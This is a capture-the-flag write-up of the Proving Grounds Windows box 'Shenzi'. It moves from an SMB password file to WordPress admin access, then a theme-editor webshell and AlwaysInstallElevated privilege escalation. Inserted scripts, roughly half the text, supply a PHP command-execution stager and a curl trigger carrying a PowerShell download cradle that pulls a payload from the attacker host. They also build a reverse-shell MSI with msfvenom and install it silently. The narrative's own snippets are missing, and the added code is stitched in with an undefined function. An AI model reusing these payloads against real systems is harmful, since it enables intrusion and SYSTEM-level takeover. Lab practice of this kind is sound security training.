Shenzi
Source: Proving Grounds | OS: Windows | Community Rating: Hard
Started with the usual autorecon and was literally bombarded with open ports: FTP (21), HTTP (80), RPC (135), SMB (139), HTTP (443), SMB (445), MySQL (3306), 5040, 7680, 49664 -> 49669
FTP was configured to not allow anonymous access, so nothing could be done there for now.
I then started with HTTP (80). It displayed XAMPP’s default page.
When I tried to access phpMyAdmin, I received the message:
"New XAMPP security concept: Access to the requested directory is only available from the local network."
I searched online for a quick bypass in case there was an easy workaround, but nothing was found, so I moved on. HTTP (443) was just a replica of HTTP (80), and the fuzzers didn’t expose anything of value either.
I started checking SMB. I checked the files from autorecon: enum4linux showed nothing, but smbclient revealed a share named Shenzi.
I connected to the share using: smbclient //192.168.213.55/Shenzi
Inside, I found a passwords.txt file:
Most passwords were defaults, except for WordPress, which wasn’t the default. That should have hinted at something.
However, I couldn't find any WordPress site. Even the fuzzers didn't expose one. I tried the credentials on FTP with no luck and kept going in circles. I started looking for hints, and that's where the name of the box/user came in handy: the WordPress site was deployed under the username, at http://192.168.213.55/shenzi/
That's what I hate about CTFs in general: this kind of guessing enumeration.
Since I already had the admin credentials for WordPress, I didn’t run wpscan. I logged in and checked if I could inject a shell into the PHP files. I went to Appearance > Theme Editor, chose a PHP file (I tested with 404.php), and injected a basic webshell:
When that worked, I uploaded Ivan Sincek’s shell, which provided a reverse shell.
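The initial-access chain above, as an added example that is not the writeup's own code or the shells it used (the author's basic webshell and Ivan Sincek's reverse shell are not reproduced here). It assumes the target 192.168.213.55, the Shenzi share and the /shenzi/ WordPress path from the writeup; the attacker LHOST/LPORT values are placeholders. The name-based candidate list is the generalization of the "guess the username" step: it feeds every name learned so far (box name, share name, users from passwords.txt) to ffuf in a few case variants, so the guess becomes a short fuzz instead of a manual hunt.

```shell
#!/bin/sh
# Added example, not from the original writeup. Attacker-side helpers for the
# Shenzi initial-access chain: null-session SMB fetch, locating a WordPress
# install hidden under a box/user name, and a one-line PHP stager for the
# theme editor. Assumptions: TARGET from the writeup; LHOST/LPORT are
# placeholders for the attacker's listener.
set -eu

TARGET="${TARGET:-192.168.213.55}"
LHOST="${LHOST:-192.168.45.200}"   # assumption: attacker IP
LPORT="${LPORT:-4444}"             # assumption: listener port

# 1. List shares without credentials, then pull the file the writeup found.
#    Needs smbclient installed and network access to the target.
smb_fetch() {
  smbclient -N -L "//$TARGET"
  smbclient -N "//$TARGET/Shenzi" -c 'ls; get passwords.txt'
}

# 2. Common wordlists do not contain "shenzi". Build a small candidate list
#    from every name already known (box name, share name, usernames) in a few
#    case and layout variants, de-duplicated, for ffuf.
wp_candidates() {
  for n in "$@"; do
    lower=$(printf '%s' "$n" | tr '[:upper:]' '[:lower:]')
    upper=$(printf '%s' "$n" | tr '[:lower:]' '[:upper:]')
    printf '%s\n' "$n" "$lower" "$upper" "$lower/wordpress" "$lower/wp"
  done | sort -u
}
# Usage: wp_candidates Shenzi admin > names.txt
#        ffuf -u "http://$TARGET/FUZZ/" -w names.txt -mc 200,301,302

# 3. Stager to paste at the top of Appearance > Theme Editor > 404.php.
#    It runs ?cmd=... with system() and exits so the theme's HTML does not
#    mix into the command output. Double quotes inside PHP keep the shell
#    quoting simple.
theme_stager() {
  printf '%s\n' '<?php if (isset($_REQUEST["cmd"])) { system($_REQUEST["cmd"]); exit; } ?>'
}

# 4. Any missing page under the WordPress root renders the theme's 404.php,
#    so a bogus path plus the cmd parameter triggers the stager.
#    --data-urlencode keeps spaces and redirection intact.
trigger() {
  curl -s -G "http://$TARGET/shenzi/this-page-does-not-exist" \
       --data-urlencode "cmd=$1"
}
# Usage: trigger 'whoami /priv'
#        trigger "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://$LHOST:$LPORT/rev.ps1')"
```

Start a listener (`nc -lvnp 4444`) before triggering a reverse-shell command; the stager itself only gives blind command execution through the 404 template.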
Once inside, I ran the basic whoami /priv
and then uploaded WinPeas. WinPeas exposed that:
This means any MSI package we install will run with elevated privileges (the setting only takes effect when it is 1 in both HKLM and HKCU, which WinPEAS confirmed here). I then created an MSI shell using msfvenom:
I then uploaded and executed it:
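The privilege-escalation step above, as an added example that is not the writeup's own commands. It assumes an x64 target, placeholder LHOST/LPORT values, and that the MSI is uploaded to C:\Windows\Temp (a path chosen here, not stated in the writeup). The two reg query lines are meant to be pasted into the reverse shell already obtained; the parser encodes the check WinPEAS performs, that the value is 0x1 in both hives, so a single hive set to 1 is correctly reported as not exploitable.

```shell
#!/bin/sh
# Added example, not from the original writeup. AlwaysInstallElevated workflow
# from the attacker side: the manual registry check WinPEAS automates, the
# msfvenom MSI build, and the install command to run on the target.
# Assumptions: LHOST/LPORT placeholders, x64 target, MSI staged in C:\Windows\Temp.
set -eu

LHOST="${LHOST:-192.168.45.200}"   # assumption: attacker IP
LPORT="${LPORT:-4444}"             # assumption: listener port
MSI="${MSI:-shell.msi}"

# 1. Commands to paste into the reverse shell on the target. The policy is
#    only honoured when BOTH hives carry the value 1.
ale_check_cmds() {
  printf 'reg query %s /v AlwaysInstallElevated\n' \
    'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer' \
    'HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

# 2. Feed the combined output of both reg queries on stdin. Succeeds only if
#    two lines report REG_DWORD 0x1; a missing key or a 0x0 in either hive
#    means msiexec will not elevate.
ale_enabled() {
  hits=$(grep -c 'AlwaysInstallElevated *REG_DWORD *0x1' || true)
  [ "$hits" -eq 2 ]
}

# 3. Reverse-shell MSI. Needs msfvenom on the attacking machine.
build_msi() {
  msfvenom -p windows/x64/shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" \
           -f msi -o "$MSI"
}

# 4. Install command for the target: /quiet suppresses the UI, and under the
#    policy the Windows Installer service runs the package as SYSTEM.
install_cmd() {
  printf 'msiexec /quiet /i C:\\Windows\\Temp\\%s\n' "$MSI"
}
# Usage: ale_check_cmds            # paste output into the reverse shell
#        ale_check_cmds_output | ale_enabled && build_msi && install_cmd
```

On the defensive side the fix is the mirror of the check: set both values to 0 (or delete them) and alert on msiexec launching from user-writable paths with the policy present.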
Always check for shares; in this case, the Shenzi share contained a passwords file that was key to moving forward.
Sometimes, manual guess-work (like identifying the WordPress site via the username) is necessary when automated tools or fuzzers yield nothing. (I hate it)
Injecting a shell via the theme editor in WordPress is an easy way to turn administrator credentials into code execution on the web server.
The AlwaysInstallElevated setting, when enabled in both HKLM and HKCU, is a reliable privilege escalation vector on Windows: any MSI installed by a low-privileged user runs as SYSTEM.